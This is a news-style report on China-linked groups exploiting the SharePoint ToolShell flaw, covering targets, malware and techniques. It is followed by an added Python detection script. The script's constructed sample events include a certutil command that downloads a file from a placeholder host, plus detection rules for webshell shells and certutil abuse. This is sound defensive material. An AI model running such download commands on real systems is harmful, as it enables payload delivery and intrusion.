Global Sharepoint ToolShell Cyberattacks: Targeting Organizations Worldwide
Chinese Hackers Exploit ToolShell Vulnerability in Microsoft SharePoint
Recent cyber attacks targeting government agencies, universities, telecommunication service providers, and finance organizations have been linked to hackers believed to have ties to China. These hackers have exploited the ToolShell vulnerability (CVE-2025-53770) in Microsoft SharePoint, affecting on-premise servers and leading to widespread attacks.
The security flaw was disclosed as an actively exploited zero-day on July 20, prompting Microsoft to release emergency updates the following day. The vulnerability serves as a bypass for CVE-2025-49706 and CVE-2025-49704, allowing remote code execution and full access to the file system without authentication.
According to reports, three Chinese threat groups (Budworm/Linen Typhoon, Sheathminer/Violet Typhoon, and Storm-2603/Warlock ransomware) have been identified as exploiting ToolShell. Symantec, a cybersecurity company, reported that the attacks were not confined to any single region, with targets in the Middle East, South America, the U.S., and Africa.
Targets of the Attacks
- A telecommunications service provider in the Middle East
- Two government departments in an African country
- Two government agencies in South America
- A university in the United States
- A state technology agency in Africa
- A Middle Eastern government department
- A European finance company
The attacks typically involved deploying webshells for persistent access, DLL side-loading of backdoors such as Zingdoor, and the use of malware such as the ShadowPad Trojan and the Sliver post-exploitation framework. Legitimate executables from Trend Micro and Bitdefender were abused for side-loading, and the threat actors also dumped credentials and compromised domains via PetitPotam.
Various tools, including Microsoft's Certutil, the GoGo scanner, and the Revsocks utility, were used for data exfiltration, command-and-control, and persistence on compromised devices. Symantec's findings suggest that the ToolShell vulnerability was exploited by a larger set of Chinese threat actors than previously known.
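As an added, defender-side illustration (not code from the article or from Symantec), here is a small Python rule set run over constructed process-creation events; it flags the two behaviours described above that leave the clearest host trace: the SharePoint IIS worker process (w3wp.exe, assumed to be the host process) spawning a shell, which is how a webshell executes commands, and certutil invoked with its download/decode switches. The event field names and the sample events are assumptions, not real telemetry.

```python
import re

# Constructed sample process-creation events (assumed schema; not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/p.bin C:\\Users\\Public\\p.bin"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\site.cer"},  # benign certutil use
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Interactive shells that a webshell typically launches from inside the IIS worker.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe"}
# certutil switches used to fetch or transform files rather than manage certificates.
CERTUTIL_ABUSE = re.compile(r"-(urlcache|decode|encode)\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path, ignoring the directory."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the rule names triggered by one process-creation event."""
    hits = []
    parent, image = basename(event["parent"]), basename(event["image"])
    # Rule 1: IIS worker process spawning a shell points to a webshell inside SharePoint.
    if parent == "w3wp.exe" and image in SHELL_CHILDREN:
        hits.append("webshell_child_process")
    # Rule 2: certutil with download/decode switches (living-off-the-land file transfer).
    if image == "certutil.exe" and CERTUTIL_ABUSE.search(event["cmdline"]):
        hits.append("certutil_download_or_decode")
    return hits


def scan(events):
    """Index and rule hits for every event that triggers at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, rules)
```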